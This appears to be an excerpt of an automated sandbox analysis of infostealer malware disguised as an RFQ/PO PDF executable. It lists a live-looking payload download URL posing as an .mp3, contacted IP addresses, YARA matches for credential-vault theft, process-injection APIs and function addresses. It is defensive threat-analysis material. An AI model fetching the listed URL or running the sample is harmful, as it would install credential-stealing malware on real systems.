                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000002.00000002.1887638572.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Afoagcjtqvi.exe, 00000007.00000002.1968221144.0000000002C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com/rigasin/Chody.mp3
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, Afoagcjtqvi.exe.0.drString found in binary or memory: https://wymascensores.com/rigasin/Chody.mp31PDOh7YFOr1sSh4
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.4:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49741 version: TLS 1.2

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3eb1aa0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 2.2.Afoagcjtqvi.exe.4256f68.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 1.2.InstallUtil.exe.600000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 2.2.Afoagcjtqvi.exe.4256f68.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3bd9550.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3d35080.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.RFQ__PO_PO 24090041-PDF____PDF.exe.3ce6860.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: initial sampleStatic PE information: Filename: RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_0621D420 NtProtectVirtualMemory,0_2_0621D420
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_0621EDA8 NtResumeThread,0_2_0621EDA8
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_0621D41F NtProtectVirtualMemory,0_2_0621D41F
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_0621EDA0 NtResumeThread,0_2_0621EDA0
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0676D420 NtProtectVirtualMemory,2_2_0676D420
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0676EDA8 NtResumeThread,2_2_0676EDA8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0676D418 NtProtectVirtualMemory,2_2_0676D418
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0676EDA0 NtResumeThread,2_2_0676EDA0
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061ED420 NtProtectVirtualMemory,7_2_061ED420
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061EEDA8 NtResumeThread,7_2_061EEDA8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061ED41E NtProtectVirtualMemory,7_2_061ED41E
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061EEDA0 NtResumeThread,7_2_061EEDA0
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_011827280_2_01182728
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_0118207D0_2_0118207D
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_011820980_2_01182098
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05EE8E840_2_05EE8E84
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05EE53900_2_05EE5390
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05EE7A780_2_05EE7A78
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05EEBC080_2_05EEBC08
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05EEBC180_2_05EEBC18
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05EED9080_2_05EED908
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05EE53810_2_05EE5381
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05EE1B200_2_05EE1B20
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05EEAA600_2_05EEAA60
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F201300_2_05F20130
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F204670_2_05F20467
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F217480_2_05F21748
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F5CED80_2_05F5CED8
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F5C3F00_2_05F5C3F0
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F53A800_2_05F53A80
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F5D6E80_2_05F5D6E8
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F5CEC80_2_05F5CEC8
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F521900_2_05F52190
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F521810_2_05F52181
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F5604B0_2_05F5604B
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F5402D0_2_05F5402D
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F5C3E00_2_05F5C3E0
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_05F53A710_2_05F53A71
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061FA6480_2_061FA648
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061FA63B0_2_061FA63B
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061FAE280_2_061FAE28
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061FAE260_2_061FAE26
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061FE6700_2_061FE670
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061FE6610_2_061FE661
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061F77180_2_061F7718
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_061F77280_2_061F7728
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_0621A6380_2_0621A638
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_06215F080_2_06215F08
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_062153030_2_06215303
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_0621D1A80_2_0621D1A8
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_06215EF80_2_06215EF8
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_062105480_2_06210548
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_0621A58D0_2_0621A58D
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_0621D1A30_2_0621D1A3
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_0621D1990_2_0621D199
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_063A00060_2_063A0006
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_063A00400_2_063A0040
                      Source: C:\Users\user\Desktop\RFQ__PO_PO 24090041-PDF____PDF.exeCode function: 0_2_063BD1A80_2_063BD1A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_023993301_2_02399330
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_02394A401_2_02394A40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_02399BA01_2_02399BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_02393E281_2_02393E28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0239CD581_2_0239CD58
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_023941701_2_02394170
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_02399AE01_2_02399AE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_05B9D4501_2_05B9D450
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_05B997081_2_05B99708
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_05B926F81_2_05B926F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_05B989931_2_05B98993
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_05B900401_2_05B90040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_05B93B681_2_05B93B68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_05B952F81_2_05B952F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_05B94C181_2_05B94C18
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_05B92E601_2_05B92E60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_05B9B9201_2_05B9B920
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_05CDA1981_2_05CDA198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_05CDBC481_2_05CDBC48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_0239D1021_2_0239D102
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_02F027282_2_02F02728
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_02F020982_2_02F02098
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_02F0207D2_2_02F0207D
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_06438E842_2_06438E84
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_06437A782_2_06437A78
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064353902_2_06435390
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0643BC082_2_0643BC08
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0643BC182_2_0643BC18
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0643AA602_2_0643AA60
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_06431B202_2_06431B20
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0643D9082_2_0643D908
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064700D02_2_064700D0
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064717482_2_06471748
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064704672_2_06470467
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064A3A802_2_064A3A80
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064AC3F02_2_064AC3F0
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064ACEC82_2_064ACEC8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064ACED82_2_064ACED8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064A3A712_2_064A3A71
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064AC3E02_2_064AC3E0
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064A604B2_2_064A604B
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064A402A2_2_064A402A
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064A21812_2_064A2181
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_064A21902_2_064A2190
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_067497082_2_06749708
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_067496F82_2_067496F8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_06749EE82_2_06749EE8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_06749ED72_2_06749ED7
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0674D7302_2_0674D730
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0674D7202_2_0674D720
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0676A6382_2_0676A638
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_06765F082_2_06765F08
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_067653032_2_06765303
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0676D1A82_2_0676D1A8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_06765EF82_2_06765EF8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_067605482_2_06760548
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0676C5302_2_0676C530
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0676D1A32_2_0676D1A3
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0676D1992_2_0676D199
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_068F00072_2_068F0007
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_068F00402_2_068F0040
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 2_2_0690D1A82_2_0690D1A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00744A483_2_00744A48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00749AE83_2_00749AE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0074CD603_2_0074CD60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_00743E303_2_00743E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_007441783_2_00744178
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_058F87A23_2_058F87A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_058F97083_2_058F9708
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_058F26F83_2_058F26F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_058F00403_2_058F0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_058FD8503_2_058FD850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_058F3B683_2_058F3B68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_058F52F83_2_058F52F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_058F4C183_2_058F4C18
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_058F2E4F3_2_058F2E4F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_058FB9203_2_058FB920
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0074D10A3_2_0074D10A
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_02A827287_2_02A82728
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_02A820987_2_02A82098
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_02A8207D7_2_02A8207D
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05EB53907_2_05EB5390
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05EB8E847_2_05EB8E84
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05EB7A787_2_05EB7A78
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05EB53817_2_05EB5381
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05EBBC087_2_05EBBC08
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05EBBC187_2_05EBBC18
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05EBD9087_2_05EBD908
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05EB1B207_2_05EB1B20
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05EBAA607_2_05EBAA60
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05EF01307_2_05EF0130
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05EF04677_2_05EF0467
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05EF17487_2_05EF1748
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05F2CED87_2_05F2CED8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05F2C3F07_2_05F2C3F0
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05F23A807_2_05F23A80
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05F2CEC87_2_05F2CEC8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05F221907_2_05F22190
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05F221817_2_05F22181
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05F2604B7_2_05F2604B
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05F2402A7_2_05F2402A
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05F2C3E07_2_05F2C3E0
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_05F23A717_2_05F23A71
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061C97087_2_061C9708
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061CD6D87_2_061CD6D8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061C9ED77_2_061C9ED7
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061CD6C87_2_061CD6C8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061C96F87_2_061C96F8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061C9EE87_2_061C9EE8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061EA6387_2_061EA638
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061E5F087_2_061E5F08
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061E53037_2_061E5303
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061ED1A87_2_061ED1A8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061E5EF87_2_061E5EF8
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061E05487_2_061E0548
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061EA58D7_2_061EA58D
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061ED1997_2_061ED199
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_061ED1A37_2_061ED1A3
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_063700067_2_06370006
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_063700407_2_06370040
                      Source: C:\Users\user\AppData\Roaming\Afoagcjtqvi.exeCode function: 7_2_0638D1A87_2_0638D1A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_02674A488_2_02674A48
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_02679AE88_2_02679AE8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_02679BA18_2_02679BA1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_02673E308_2_02673E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_026741788_2_02674178
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0267D1188_2_0267D118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_026727F48_2_026727F4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0267D1128_2_0267D112
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTotlz.exe, vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1762985351.0000000003CE6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea7d296ea-7bde-41de-8abb-8da88cb3fc93.exe4 vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1766602300.00000000062A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002F37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1765112405.0000000005DC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGrcoosrtoct.dll" vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1764780727.0000000005D2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTotlz.exe, vs RFQ__PO_PO 24090041-PDF____PDF.exe
                      Source: RFQ__PO_PO 24090041-PDF____PDF.exe, 00000000.00000002.1753923605.0000000002FEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea7d296ea-7bde-41de-8abb-8da88cb3fc93.exe4 vs RFQ__PO_PO 24090041-PDF____PDF.exe
